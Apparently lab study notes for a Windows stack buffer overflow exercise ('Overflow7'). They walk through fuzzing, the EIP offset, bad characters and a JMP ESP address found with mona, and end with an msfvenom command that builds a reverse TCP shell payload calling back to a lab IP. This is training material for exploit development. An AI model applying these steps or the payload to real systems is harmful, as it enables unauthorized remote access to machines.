Overflow7

1. Fuzz application to find number of bytes needed to crash the application

Bytes needed to crash application: 1400

2. Set mona configuration

!mona config -set workingfolder c:\mona\%p

3. Find EIP offset

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1400

!mona findmsp -distance 1400

EIP offset: 1306

4. Find bad characters

!mona bytearray -b "\x00"

!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP address>

Bad characters: \x00\x8c\xae\xbe\xfb

5. Find jmp esp instruction sets without any bad characters

!mona jmp -r esp -cpb "\x00\x8c\xae\xbe\xfb"

Return address: 0x625011af

6. Generate shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=10.9.141.31 LPORT=4444 EXITFUNC=thread -b "\x00\x8c\xae\xbe\xfb" -f c

7. Set nop sled in padding